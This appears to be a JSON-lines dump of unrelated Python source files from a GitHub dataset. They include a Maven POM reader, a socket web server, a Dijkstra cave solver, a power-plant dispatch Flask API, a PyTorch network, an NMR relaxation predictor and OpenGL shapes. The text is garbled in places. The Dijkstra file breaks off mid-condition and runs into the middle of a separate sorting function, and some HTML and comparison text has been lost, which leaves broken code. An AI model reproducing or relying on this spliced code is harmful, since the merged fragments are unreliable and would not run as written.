self._exclude_from_blackduck_scan: Optional[bool] = None\n self._parent_group_id: Optional[str] = None\n self._parent_artifact_id: Optional[str] = None\n\n self._reader_config: MavenModuleReaderConfiguration = reader_config if reader_config is not None else MavenModuleReaderConfiguration()\n self._root_node: XmlTree = XmlTree.parse(pom_file.resolve()).getroot()\n self._verbose: bool = verbose\n\n def get_module(self) -> Optional[MavenModule]:\n maybe_ignored_pom: Optional[IgnoredPom] = self._reader_config.try_find_ignored_pom(self._pom_file)\n if maybe_ignored_pom is not None:\n self._log(f\"Skipping ignored pom \\\"{self._pom_file}\\\": {maybe_ignored_pom.reason}\")\n return None\n\n try:\n self._read_module_properties()\n\n if self._artifact_id is None:\n self._log(f\"Skipping module defined in \\\"{self._pom_file.resolve()}\\\": No artifactId defined\")\n return None\n\n self._read_parent_properties()\n self._inherit_group_id_if_necessary()\n self._read_additional_properties()\n\n except:\n pass\n\n maybe_ignored_module: Optional[IgnoredMavenModule] = self._reader_config.try_find_ignored_module(self._group_id,\n self._artifact_id)\n if maybe_ignored_module is not None:\n self._log(\n f\"Skipping ignored module \\\"{self._group_id}:{self._artifact_id}\\\": {maybe_ignored_module.reason}\")\n return None\n\n self._verify()\n\n self._log(\n f\"Extracted module \\\"{self._group_id}:{self._artifact_id}\\\" from \\\"{self._pom_file.resolve()}\\\"\")\n return MavenModule(self._group_id,\n self._artifact_id,\n self._packaging,\n self._release_audience,\n self._release_maturity,\n self._pom_file,\n self._exclude_from_blackduck_scan,\n self._parent_group_id,\n self._parent_artifact_id)\n\n def _read_module_properties(self) -> None:\n artifact_id_element: XmlTree = self._find(self._root_node, \"artifactId\")\n\n if artifact_id_element is not None:\n self._artifact_id = artifact_id_element.text\n\n group_id_element: XmlTree = self._find(self._root_node, \"groupId\")\n\n if group_id_element is not None:\n self._group_id = group_id_element.text\n\n packaging_type_element: XmlTree = self._find(self._root_node, \"packaging\")\n if packaging_type_element is not None:\n self._packaging = packaging_type_element.text\n else:\n self._packaging = \"jar\"\n\n def _read_parent_properties(self) -> None:\n parent_root: XmlTree = self._find(self._root_node, \"parent\")\n if parent_root is None:\n return\n\n self._parent_group_id = self._find_or_raise(parent_root, \"groupId\").text\n self._parent_artifact_id = self._find_or_raise(parent_root, \"artifactId\").text\n\n def _inherit_group_id_if_necessary(self) -> None:\n if self._group_id is None and self._parent_group_id is not None:\n self._group_id = self._parent_group_id\n\n def _read_additional_properties(self) -> None:\n properties_root: XmlTree = self._find_or_raise(self._root_node, \"properties\")\n\n self._release_audience = ReleaseAudience(self._find_or_raise(properties_root, \"x-sap-release-audience\").text)\n self._release_maturity = ReleaseMaturity(self._find_or_raise(properties_root, \"x-sap-release-maturity\").text)\n\n exclude_from_blackduck_scan_element: XmlTree = self._find(properties_root,\n \"x-sap-exclude-from-blackduck-scan\")\n if exclude_from_blackduck_scan_element is not None:\n self._exclude_from_blackduck_scan = bool(exclude_from_blackduck_scan_element.text)\n\n def _verify(self) -> None:\n missing_properties: List[str] = []\n\n if self._artifact_id is None:\n missing_properties.append(\"artifactId\")\n\n if self._group_id is None:\n missing_properties.append(\"groupId\")\n\n if self._packaging is None:\n missing_properties.append(\"packaging\")\n\n if self._release_audience is None:\n missing_properties.append(\"releaseAudience\")\n\n if self._release_maturity is None:\n missing_properties.append(\"releaseMaturity\")\n\n if self._exclude_from_blackduck_scan is None:\n self._exclude_from_blackduck_scan = False\n\n if self._parent_group_id is not None and self._parent_artifact_id is None:\n missing_properties.append(\"parentArtifactId\")\n elif self._parent_group_id is None and self._parent_artifact_id is not None:\n missing_properties.append(\"parentGroupId\")\n\n if len(missing_properties) > 0:\n ex: ModuleAttributesMissingException = ModuleAttributesMissingException(self._pom_file, missing_properties)\n self._log(str(ex))\n raise ex\n\n def _log(self, message: str) -> None:\n if self._verbose:\n print(message)\n\n def _find_or_raise(self, parent: XmlTree, tag: str) -> XmlTree:\n found_node: XmlTree = MavenModuleReader._find(parent, tag)\n\n if found_node is None:\n raise Exception(\n f\"Unable to find xml tag \\\"{parent.tag}/{tag}\\\" in \\\"{self._pom_file.resolve()}\\\".\")\n\n return found_node\n\n @staticmethod\n def _find(parent: XmlTree, tag: str) -> XmlTree:\n return parent.find(f\"{{http://maven.apache.org/POM/4.0.0}}{tag}\")\n","repo_name":"SAP/cloud-sdk-java","sub_path":"scripts/common/_maven_module/maven_module_reader.py","file_name":"maven_module_reader.py","file_ext":"py","file_size_in_byte":9401,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"39775909861","text":"import socket\n\n\nclass WebServer(object):\n def __init__(self):\n with socket.socket() as tcp_socket:\n # 防止端口占用\n tcp_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n # 绑定端口\n tcp_socket.bind(('', 8080))\n # 监听\n tcp_socket.listen()\n # 等待客户端连接\n while True:\n self.client_socket, self.client_addr = tcp_socket.accept()\n self.handle()\n\n def handle(self):\n with self.client_socket:\n print(f\"[来自{self.client_addr}的消息:\")\n data = self.client_socket.recv(2048)\n if data:\n print(data.decode(\"utf-8\"))\n self.client_socket.send(\n b\"HTTP/1.1 200 ok\\r\\nContent-Type: text/html;charset=utf-8\\r\\n\\r\\n

Web Server Test

\"\n )\n\n\nif __name__ == \"__main__\":\n WebServer()\n","repo_name":"lotapp/BaseCode","sub_path":"python/6.net/4.web/2.webserver/1.webserver1.py","file_name":"1.webserver1.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"74966099075","text":"#Constroe colunas do jogo Mario\ndef main():\n altura = pegar_altura()\n for i in range(altura):\n print(\"#\") \n\n #faz a saída sem quebrar linha, escrevendo quatro ?\n print(\"?\" * 4, end=\"\") #default do parametro end é \"\\n\" \n print()\n print()\n\n for i in range(3):\n print(\"#\" * 3)\n \ndef pegar_altura():\n while True:\n try:\n n = int(input(\"Altura: \"))\n if n > 0:\n break\n except ValueError:\n print(\"Não é um número inteiro\")\n return n\n\nmain()\n","repo_name":"danielrossi-gt/Python","sub_path":"Mario/mario.py","file_name":"mario.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38065403417","text":"import sys\nimport heapq\ninput = sys.stdin.readline\nnm = [[-1, 0], [0, -1], [1, 0], [0, 1]]\na = 1\nwhile a:\n n = int(input())\n if n == 0:\n break\n cave = [list(map(int, input().split())) for _ in range(n)]\n dist = [[sys.maxsize for _ in range(n)] for _ in range(n)]\n dist[0][0] = cave[0][0]\n q = [[cave[0][0],0,0]]\n while q:\n dis,x,y = heapq.heappop(q)\n if x==n-1 and y==n-1:\n print('Problem {}: {}'.format(a,dis))\n a+=1\n break\n if dis > dist[x][y]:\n continue\n for [nx,ny] in nm:\n tx = x+nx\n ty = y+ny\n if 0<=tx 0 and current_element['minimum_price'] < feature[current_position-1]['minimum_price']:\r\n \r\n #change position\r\n feature[current_position] = feature[current_position-1]\r\n current_position -= 1\r\n \r\n #updating current element\r\n feature[current_position] = current_element\r\n return(feature)\r\n\r\n#######################################################################################\r\n#function to dispatch the load following on the sorting order found by the function sort\r\ndef load_attribution(data):\r\n feature=sort(data)\r\n load = data['load']\r\n \r\n #initialization of variables\r\n name_total = []\r\n p_total = []\r\n p=0\r\n \r\n for j in range (len(feature)):\r\n #if the load has been totally dispatched the next values will all be 0\r\n if load <= 0:\r\n p = 0\r\n \r\n else: \r\n #adding load for windturbines\r\n if feature[j]['type'] == 'windturbine':\r\n p = feature[j]['pmax']*data['fuels']['wind(%)']/100\r\n #if the p is too hign it takes the value of the remaining load\r\n if p > load:\r\n p = load\r\n \r\n #adding load for gasfired or turbojet\r\n elif feature[j]['type'] == 'gasfired' or feature[j]['type'] == 'turbojet':\r\n p = feature[j]['pmax']\r\n #if the p is too hign it takes the value of the remaining load\r\n if p > load:\r\n p = load\r\n \r\n #if the p is too low it takes the value Pmin and it decreases the load of the previous plant\r\n elif p < feature[j]['pmin']:\r\n p_total[j-1]=p_total[j-1]-(feature[j]['pmin']-p)\r\n p = feature[j]['pmin']\r\n load = p\r\n \r\n #updating load \r\n load = load - p\r\n \r\n #adding corresponding p and name to the output\r\n name_total.append(feature[j]['name'])\r\n p_total.append(round(p,1))\r\n \r\n \r\n return(p_total,name_total)\r\n \r\n######################################################################################### \r\n#function that gives a json file as an output with the name and the corresponding load of each plant\r\ndef response(data):\r\n response={}\r\n (p,name)=load_attribution(data)\r\n for k in range (len(p)):\r\n response[k]={\r\n 'name': name[k],\r\n 'p': p[k]}\r\n #saving response as a json file\r\n with open('response.json', 'w') as mon_fichier:\r\n json.dump(response, mon_fichier)\r\n #reading the json file as an output\r\n with open('response.json') as f:\r\n final = json.loads(f.read())\r\n return(final)\r\n \r\n\r\n#########################################################################################\r\n#########################################################################################\r\n\r\n\r\napp = Flask(__name__)\r\napi = Api(app)\r\n\r\n\r\n#API creation\r\n\r\nclass ProductionPlan(Resource):\r\n \r\n def post(self):\r\n #adding a file called name (eg of an URL: http://127.0.0.1:8888/productionplan?name=payload3.json)\r\n parser = reqparse.RequestParser()\r\n parser.add_argument('name', required=True)\r\n args = parser.parse_args()\r\n \r\n #creating a variable new_data which is the file given\r\n new_data=args.name\r\n \r\n with open(new_data) as f:\r\n data = json.loads(f.read())\r\n #running all the functions above\r\n output=response(data)\r\n return {'data': output}, 200 # return data and 200 OK code\r\n \r\n \r\napi.add_resource(ProductionPlan, '/productionplan') # '/productionplan' is our entry point\r\n\r\nif __name__ == '__main__':\r\n app.run(port=8888) # run our Flask app on the 8888 port\r\n ","repo_name":"eglantineboucher/Coding-challenge-ENGIE","sub_path":"coding_challenge_engie_Eglantine_Boucher.py","file_name":"coding_challenge_engie_Eglantine_Boucher.py","file_ext":"py","file_size_in_byte":5569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30033792415","text":"from api import app\nimport unittest\n\n\nclass FlaskTest(unittest.TestCase):\n def runTest_train(self):\n tester = app.test_client(self)\n response = tester.get(\"train\")\n status_code = response.status_code\n self.assertEqual(status_code, 200)\n print(\"test case 1 completed\")\n\n def runTest_prediction(self):\n tester = app.test_client(self)\n response = tester.get(\"/prediction/\")\n status_code = response.status_code\n self.assertEqual(status_code, 308)\n print(\"test case 2 completed\")\n\n\nif __name__ == \"__main__\":\n tester = FlaskTest()\n tester.runTest_train()\n tester.runTest_prediction()\n","repo_name":"SARIKAYA77/case","sub_path":"etiya/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73287254595","text":"from functionrefactor.parser import Parser\nfrom tests.common_functions import *\n\n\ndef test_namespace():\n ''' ignores_new lines '''\n _in = [\n \"namespace Nutella\", \"{\", \"}\", \"namespace PeanutButter{\", \"}\",\n \"namespace Cereal{ //something\", \"}\"\n ]\n\n expected_result_hpp = [\n \"namespace Nutella {}// namespace Nutella\",\n \"namespace PeanutButter {}// namespace PeanutButter\",\n \"namespace Cereal {//something}// namespace Cereal\"\n ]\n expected_result_cpp = [\n \"namespace Nutella {}// namespace Nutella\",\n \"namespace PeanutButter {}// namespace PeanutButter\",\n \"namespace Cereal {}// namespace Cereal\"\n ]\n\n parser = Parser()\n parse_batch_run(_in, expected_result_hpp, expected_result_cpp,\n lambda i, txt, h: parser._parse_namespace_block(i, txt, h))\n\n\ndef test_class():\n ''' ignores_new lines '''\n _in = [\n \"class Nutella\", \"{\", \"};\", \"class PeanutButter{\", \"};\",\n \"class PeanutButter{//something\", \"};\"\n ]\n\n expected_result_hpp = [\n \"class Nutella {}; \", \"class PeanutButter {}; \",\n \"class PeanutButter {//something}; \"\n ]\n\n expected_result_cpp = [\"\", \"\", \"\"]\n\n parser = Parser()\n parse_batch_run(_in, expected_result_hpp, expected_result_cpp,\n lambda i, txt, h: parser._parse_class_block(i, txt, h))\n","repo_name":"astrodroid/functionrefactor","sub_path":"tests/test_namespace_class.py","file_name":"test_namespace_class.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24964963476","text":"# -*- coding: utf-8 -*-\n\"\"\"\nImplementation of a neural network using PyTorch.\nCreated on Tue Mar 26 14:00:00 2019\nAuthor: Prasun Roy | CVPRU-ISICAL (http://www.isical.ac.in/~cvpr)\nGitHub: https://github.com/prasunroy/pytorch-bootcamp\n\nReferences:\n[1] https://pytorch.org/tutorials/beginner/pytorch_with_examples.html\n\n\"\"\"\n\n\n# imports\nimport torch\nimport time\n\n\nt0 = time.time()\n\n# Set random number generator seed for reproducibility.\ntorch.manual_seed(0)\n\n# Set device.\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\n# N is batch size; D_in is input dimension;\n# H is hidden dimension; D_out is output dimension.\nN, D_in, H, D_out = 25, 100, 50, 10\n\n# Create random input and output data.\nx = torch.randn(N, D_in, dtype=torch.float, device=device)\ny = torch.randn(N, D_out, dtype=torch.float, device=device)\n\n# Randomly initialize weights.\nw1 = torch.randn(D_in, H, dtype=torch.float, device=device)\nw2 = torch.randn(H, D_out, dtype=torch.float, device=device)\n\n# Set learning rate.\nlearning_rate = 1e-6\n\n# Train neural network.\nfor epoch in range(1000):\n # Forward pass: compute predicted y\n h = x.mm(w1)\n h_relu = h.clamp(min=0)\n y_pred = h_relu.mm(w2)\n \n # Compute loss.\n loss = (y_pred - y).pow(2).sum().item()\n print(f'[PyTorch_{device.type.upper()}] Epoch {epoch+1:4d} | Loss {loss:.4f}')\n \n # Backprop to compute gradients of loss with respect to w1 and w2.\n grad_y_pred = 2.0 * (y_pred - y)\n grad_w2 = h_relu.t().mm(grad_y_pred)\n grad_h_relu = grad_y_pred.mm(w2.t())\n grad_h = grad_h_relu.clone()\n grad_h[h < 0] = 0\n grad_w1 = x.t().mm(grad_h)\n \n # Update weights.\n w1 -= learning_rate * grad_w1\n w2 -= learning_rate * grad_w2\n\nt1 = time.time()\n\nprint(f'\\nTotal execution time: {t1-t0:.2f} seconds')\n","repo_name":"prasunroy/pytorch-bootcamp","sub_path":"nn_torch_v1.py","file_name":"nn_torch_v1.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38015980053","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPRE prediction Class\n--------------------\n\nClass to perform Paramagnetic Relaxation Enhancement prediction, employing the Model-Free Solomon-Bloembergen equation.\n\n\"\"\"\n\nimport os\nimport numpy as np\nimport MDAnalysis\nfrom MDAnalysis.coordinates.memory import MemoryReader\nimport pandas as pd\nimport logging\nfrom DEERPREdict.utils import Operations\n\nclass PREpredict(Operations):\n \"\"\"Calculation of the distance profile between a probe and backbone amide.\"\"\"\n\n def __init__(self, protein, residue, **kwargs):\n \"\"\"\n Args:\n protein (:py:class:`MDAnalysis.core.universe.Universe`): trajectory\n residue (int): residue labeled with the paramagnetic probe\n \"\"\"\n Operations.__init__(self, protein, **kwargs)\n self.residue = residue\n # Class specific instance attributes\n logging.basicConfig(filename=kwargs.get('log_file', 'log'),level=logging.INFO)\n\n residue_sel = \"resid {:d}\".format(self.residue)\n if type(self.chains[0]) == str:\n residue_sel += \" and segid {:s}\".format(self.chains[0])\n logging.info('{:s} = {:s}'.format(residue_sel,self.protein.select_atoms(residue_sel).atoms.resnames[0]))\n\n # Approximate electron position at Cbeta\n self.Cbeta = kwargs.get('Cbeta', False)\n self.atom_selection = kwargs.get('atom_selection', 'N')\n self.resnums = np.array(protein.select_atoms('name N and protein').resnums)\n self.measured_sel = 'name {:s} and not resid {:d} and not resid 1 and not resname PRO'.format(self.atom_selection, residue)\n if type(self.chains[0]) == str:\n self.measured_sel = 'name {:s} and not (resid {:d} and segid {:s}) and not resid 1 and not resname PRO'.format(self.atom_selection, residue, self.chains[0])\n if type(self.chains[1]) == str:\n self.resnums = np.array(protein.select_atoms('name N and protein and segid {:s}'.format(self.chains[1])).resnums)\n self.measured_sel += ' and segid {:s}'.format(self.chains[1])\n self.measured_resnums = np.array(protein.select_atoms(self.measured_sel).resnums)\n _, self.measured_resnums, _ = np.intersect1d(self.resnums,self.measured_resnums,return_indices=True)\n\n def trajectoryAnalysis(self):\n logging.info(\"Starting rotamer distance analysis of trajectory {:s} \"\n \"with labeled residue {:d}\".format(self.protein.trajectory.filename,self.residue))\n # Create arrays to store per-frame inverse distances, angular order parameter, and relaxation rate\n r3 = np.full((self.protein.trajectory.n_frames, self.measured_resnums.size), np.nan)\n r6 = np.full(r3.shape, np.nan)\n angular = np.full(r3.shape, np.nan)\n zarray = np.empty(0) # Array of steric partition functions (sum over Boltzmann weights)\n # Before getting into this loop, which consumes most of the calculations time\n # we can pre-calculate several objects that do not vary along the loop\n universe, prot_atoms, LJ_data = self.precalculate_rotamer(self.residue, self.chains[0])\n for frame_ndx, _ in enumerate(self.protein.trajectory):\n # Fit the rotamers onto the protein\n rotamersSite = self.rotamer_placement(universe, prot_atoms)\n # Calculate Boltzmann weights\n boltz, z = self.rotamerWeights(rotamersSite, LJ_data)\n # Skip this frame if the sum of the Boltzmann weights is smaller than the cutoff value\n zarray = np.append(zarray,z)\n if z <= self.z_cutoff:\n # Store the radius of gyration of tight frames\n continue\n # Calculate interaction distances and squared angular components of the order parameter\n r3[frame_ndx], r6[frame_ndx], angular[frame_ndx] = self.rotamerPREanalysis(rotamersSite, boltz)\n # Saving analysis as a pickle file\n data = pd.Series({'r3':r3.astype(np.float32), 'r6':r6.astype(np.float32), 'angular':angular.astype(np.float32)})\n data.to_pickle(self.output_prefix+'-{:d}.pkl'.format(self.residue),compression='gzip')\n np.savetxt(self.output_prefix+'-Z-{:d}.dat'.format(self.residue),zarray)\n # logging.info('Calculated distances and order parameters are saved to {}.'.format(self.output_prefix+'-{:d}.pkl'.format(residue)))\n return data\n\n def trajectoryAnalysisCbeta(self):\n # Create arrays to store per-frame inverse distances, angular order parameter, and relaxation rate\n r3 = np.full((self.protein.trajectory.n_frames, self.measured_resnums.size), np.nan)\n r6 = np.full(r3.shape, np.nan)\n angular = np.full(r3.shape, np.nan)\n residue_sel = \"resid {:d}\".format(self.residue)\n if type(self.chains[0]) == str:\n residue_sel += \" and segid {:s}\".format(self.chains[0])\n for frame_ndx, _ in enumerate(self.protein.trajectory):\n # Positions of the Cbeta atom of the spin-labeled residue\n spin_labeled_Cbeta = self.protein.select_atoms(\"protein and name CB and \"+residue_sel).positions\n # Positions of the backbone nitrogen atoms\n amide_pos = self.protein.select_atoms(self.measured_sel).positions\n # Distances between nitroxide and amide groups\n dists_array_r = np.linalg.norm(spin_labeled_Cbeta - amide_pos,axis=1)\n r6[frame_ndx] = np.power(dists_array_r,-6)\n #dists_array_r = mda_dist.distance_array(spin_labeled_Cbeta,amide_nit_pos,backend='OpenMP')\n # Saving analysis as a pickle file\n data = pd.Series({'r3':r3.astype(np.float32), 'r6':r6.astype(np.float32), 'angular':angular.astype(np.float32)})\n data.to_pickle(self.output_prefix+'-{:d}.pkl'.format(self.residue),compression='gzip')\n # logging.info('Calculated distances and order parameters are saved to {}.'.format(self.output_prefix+'-{:d}.pkl'.format(residue)))\n return data\n\n def save(self, data):\n if isinstance(self.weights, np.ndarray):\n if self.weights.size != data['r6'].shape[0]:\n logging.info('Weights array has size {} whereas the number of frames is {}'.\n format(self.weights.size, data['r6'].shape[0]))\n raise ValueError('Weights array has size {} whereas the number of frames is {}'.\n format(self.weights.size, data['r6'].shape[0]))\n elif self.weights == False:\n self.weights = np.ones(data['r6'].shape[0])\n else:\n logging.info('Weights argument should be a numpy array')\n raise ValueError('Weights argument should be a numpy array')\n # Transverse relaxation rate enhancement due to the presence of the unpaired electron\n gamma_2_av = np.full(self.resnums.size, fill_value=np.NaN)\n if (self.Cbeta):\n gamma_2 = self.calc_gamma_2_Cbeta(data['r6'], self.tau_c, self.wh, self.k)\n else:\n s_pre = np.power(data['r3'], 2)/data['r6']*data['angular']\n gamma_2 = self.calc_gamma_2(data['r6'], s_pre, self.tau_c, self.tau_t, self.wh, self.k)\n # Weighted average of gamma_2 over the conformational ensemble\n gamma_2 = np.ma.MaskedArray(gamma_2, mask=np.isnan(gamma_2))\n gamma_2_av[self.measured_resnums] = np.ma.average(gamma_2, weights=self.weights, axis=0).data\n # Paramagnetic / diamagnetic intensity ratio\n i_ratio = self.r_2 * np.exp(-gamma_2_av * self.delay) / ( self.r_2 + gamma_2_av )\n np.savetxt(self.output_prefix+'-{}.dat'.format(self.residue),np.c_[self.resnums,i_ratio,gamma_2_av],header='residue i_ratio gamma_2')\n\n def run(self, **kwargs):\n self.tau_c = kwargs.get('tau_c', 1.0e-9) # rotational tumbling time\n self.tau_t = kwargs.get('tau_t', 5.0e-10) # internal correlation time \n self.wh = kwargs.get('wh', 700.0) # proton Larmor frequency / (2 pi 1e6)\n self.k = kwargs.get('k', 1.23e16) \n self.delay = kwargs.get('delay', 10.0e-3) # INEPT delay\n # Diamagnetic transverse relaxation rate\n self.r_2 = np.full(self.resnums.size, fill_value=np.NaN) # transverse relaxation rate\n self.r_2[self.measured_resnums] = kwargs.get('r_2', 10.0) # in the diamagnetic molecule\n # Output\n self.output_prefix = kwargs.get('output_prefix', 'res')\n # Input\n self.load_file = kwargs.get('load_file', False)\n # Weights for each frame\n self.weights = kwargs.get('weights', False)\n if self.load_file:\n if os.path.isfile(self.load_file):\n logging.info('Loading pre-computed data from {} - will not load trajectory file.'.format(self.load_file))\n else:\n logging.info('File {} not found!'.format(self.load_file))\n raise FileNotFoundError('File {} not found!'.format(self.load_file))\n data = pd.read_pickle(self.load_file,compression='gzip')\n else:\n if self.Cbeta:\n data = self.trajectoryAnalysisCbeta()\n else:\n data = self.trajectoryAnalysis()\n self.save(data)\n","repo_name":"KULL-Centre/DEERpredict","sub_path":"DEERPREdict/PRE.py","file_name":"PRE.py","file_ext":"py","file_size_in_byte":9144,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"19244963677","text":"__author__ = 'Dmitry Patashov'\r\n\r\nimport numpy as np\r\nimport numbers\r\nimport operator\r\nimport os\r\n\r\n# Assignment 1:\r\ndef myList2Text(myList):\r\n\r\n if myList.__class__ != [].__class__:\r\n return None\r\n\r\n myStr = ''\r\n for k in range(len(myList)):\r\n myStr += str(myList[k])\r\n\r\n return myStr\r\n\r\n# Assignment 2:\r\ndef myListMean(myList):\r\n\r\n if myList.__class__ != [].__class__:\r\n return None\r\n\r\n MyL = enumerate(myList)\r\n subL = list()\r\n subLind = list()\r\n for Instance in MyL:\r\n x = Instance[1]\r\n tst = isinstance(x, numbers.Number)\r\n if tst:\r\n subL.append(Instance[1])\r\n subLind.append(Instance[0])\r\n\r\n meanVal = np.float64(sum(subL)) / np.float64(len(subL))\r\n Dist = np.absolute(meanVal - subL)\r\n Location = subLind[min(enumerate(Dist), key=operator.itemgetter(1))[0]]\r\n\r\n print ('Mean Value =', meanVal, 'Location =', Location)\r\n\r\n# Assignment 3:\r\ndef list_files(directory=None):\r\n\r\n if directory == None:\r\n directory = os.getcwd()\r\n\r\n if os.path.exists(directory) == False:\r\n directory = os.getcwd()\r\n print ('Error: Directory does not exist!')\r\n\r\n return [x for x in os.listdir(directory) if os.path.isfile(os.path.join(directory, x))]\r\n\r\n# Assignment 4:\r\ndef create_3darray(myTuple):\r\n\r\n if myTuple.__class__ != tuple('0').__class__:\r\n return None\r\n\r\n return np.zeros(myTuple)\r\n\r\n# Assignment 5:\r\ndef myRot13(myText):\r\n\r\n if myText.__class__ != ''.__class__:\r\n return None\r\n\r\n key = {'a': 'n', 'b': 'o', 'c': 'p', 'd': 'q', 'e': 'r', 'f': 's', 'g': 't', 'h': 'u',\r\n 'i': 'v', 'j': 'w', 'k': 'x', 'l': 'y', 'm': 'z', 'n': 'a', 'o': 'b', 'p': 'c',\r\n 'q': 'd', 'r': 'e', 's': 'f', 't': 'g', 'u': 'h', 'v': 'i', 'w': 'j', 'x': 'k',\r\n 'y': 'l', 'z': 'm', 'A': 'N', 'B': 'O', 'C': 'P', 'D': 'Q', 'E': 'R', 'F': 'S',\r\n 'G': 'T', 'H': 'U', 'I': 'V', 'J': 'W', 'K': 'X', 'L': 'Y', 'M': 'Z', 'N': 'A',\r\n 'O': 'B', 'P': 'C', 'Q': 'D', 'R': 'E', 'S': 'F', 'T': 'G', 'U': 'H', 'V': 'I',\r\n 'W': 'J', 'X': 'K', 'Y': 'L', 'Z': 'M'}\r\n\r\n result = ''\r\n for x in myText:\r\n if ord(x) >= ord('a') and ord(x) <= ord('z') or ord(x) >= ord('A') and ord(x) <= ord('Z'):\r\n result += key[x]\r\n else:\r\n result += x\r\n return result\r\n\r\n# Assignment 6:\r\ndef countMyWords(myStr):\r\n\r\n if myStr.__class__ != ''.__class__:\r\n return None\r\n\r\n Dist = ord('A') - ord('a')\r\n myList = list(myStr)\r\n for k in range(len(myStr)):\r\n if ord(myStr[k]) >= ord('A') and ord(myStr[k]) <= ord('Z'):\r\n myList[k] = chr(ord(myStr[k]) - Dist)\r\n\r\n newStr = \"\".join(myList)\r\n tmpList = newStr.split()\r\n\r\n ResD = {}\r\n while len(tmpList):\r\n ResD[tmpList[0]] = tmpList.count(tmpList[0])\r\n tmpList = list(filter(lambda a: a != tmpList[0], tmpList))\r\n\r\n print (\"{:<20} {}\".format('Word', 'Occurrences'))\r\n for myKey, myLabel in ResD.items():\r\n print (\"{:<20} {}\".format(myKey, myLabel))\r\n\r\n# Assignment 7:\r\ndef robot_dist(up, down, left, right):\r\n\r\n xcount = 0\r\n if up.__class__ != xcount.__class__ or \\\r\n down.__class__ != xcount.__class__ or \\\r\n left.__class__ != xcount.__class__ or \\\r\n right.__class__ != xcount.__class__:\r\n\r\n return None\r\n\r\n ycount = up - down\r\n xcount = right - left\r\n\r\n Distance = (ycount ** 2 + xcount ** 2) ** 0.5\r\n Angle = np.arctan2(ycount, xcount)\r\n\r\n return Distance, Angle\r\n\r\n","repo_name":"haimadrian/AlgorithmsInMultimediaUsingPython","sub_path":"All_Sols/CW/ClassWork2Sol35/FunctionList.py","file_name":"FunctionList.py","file_ext":"py","file_size_in_byte":3532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"14632765061","text":"from OpenGL.GL import *\nfrom OpenGL.GLUT import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GLE import *\nfrom math import *\nfrom od_utils import *\n\n\nclass od_shape:\n def __init__(self, name=None):\n self.id = glGenLists(1)\n self._name = name\n\n def draw(self):\n if glIsList(self.id):\n glCallList(self.id)\n\n def __del__(self):\n if glIsList(self.id):\n glDeleteLists(self.id, 1)\n\n def name(self):\n return self._name;\n \nclass od_cylinder(od_shape):\n def __init__(self, rad, top, height, name= \"cylinder\", slices=10, stacks=2):\n od_shape.__init__(self, name)\n x=[]\n y=[]\n self.rad = rad\n self.top = top\n self.height = height\n half_h = height/2.0\n glNewList(self.id, GL_COMPILE)\n for i in range(slices):\n theta = 2.0*pi/slices*i\n c = rad*cos(theta)\n s = rad*sin(theta)\n x.append(c)\n y.append(s)\n glBegin(GL_LINE_LOOP)\n for i in range(slices):\n glVertex3f(x[i], y[i], half_h)\n glEnd()\n glBegin(GL_LINE_LOOP)\n for i in range(slices):\n glVertex3f(x[i], y[i], -half_h)\n glEnd()\n glBegin(GL_LINES)\n for i in range(slices):\n glVertex3f(x[i], y[i], -half_h)\n glVertex3f(x[i], y[i], half_h)\n glEnd()\n glEndList()\n\n def save(self, n, temp):\n att=[]\n att = toxml_block(n+1, \"type\", [self.name()], att)\n att = toxml_block(n+1, \"dims\", [str(self.rad)+' '+str(self.top)+' '+str(self.height)], att)\n temp = toxml_block(n, \"shape\", att, temp)\n return temp\n \nclass od_box(od_shape):\n def __init__(self, l, w, h, name=\"box\"):\n od_shape.__init__(self, name)\n self.l = l\n self.w = w\n self.h = h\n glNewList(self.id, GL_COMPILE)\n glTranslatef(-l/2.0, -w/2.0, -h/2.0) \n glBegin(GL_LINE_LOOP)\n glVertex3f(0.0, 0.0, 0.0)\n glVertex3f(l, 0.0, 0.0)\n glVertex3f(l, w, 0.0)\n glVertex3f(0.0, w, 0.0)\n glEnd()\n glBegin(GL_LINE_LOOP)\n glVertex3f(0.0, 0.0, h)\n glVertex3f(l, 0.0, h)\n glVertex3f(l, w, h)\n glVertex3f(0.0, w, h)\n glEnd()\n glBegin(GL_LINE_LOOP)\n glVertex3f(0.0, 0.0, 0.0)\n glVertex3f(0.0, 0.0, h)\n glVertex3f(l, 0.0, 0.0)\n glVertex3f(l, 0.0, h)\n glEnd()\n glBegin(GL_LINE_LOOP)\n glVertex3f(l, w, 0.0)\n glVertex3f(l, w, h)\n glVertex3f(0.0, w, 0.0)\n glVertex3f(0.0, w, h)\n glEnd()\n glEndList()\n\n def save(self, n, temp):\n att=[]\n att = toxml_block(n+1, \"type\", [self.name()], att)\n att = toxml_block(n+1, \"dims\", [str(self.l)+' '+str(self.w)+' '+str(self.h)], att)\n temp = toxml_block(n, \"shape\", att, temp)\n return temp\n\nclass od_link(od_shape):\n def __init__(self, l, w, h, name=\"link\"):\n od_shape.__init__(self, name)\n self.l = l\n self.w = w\n self.h = h\n h_l = l/2.0\n h_w = w/2.0\n h_h = h/2.0\n arc_pnts_f=[]\n arc_pnts_b=[]\n low_pnts=[[0.0, 0.0, 0.0], [l, 0.0, 0.0], [l, w, 0.0], [0.0, w, 0.0]]\n 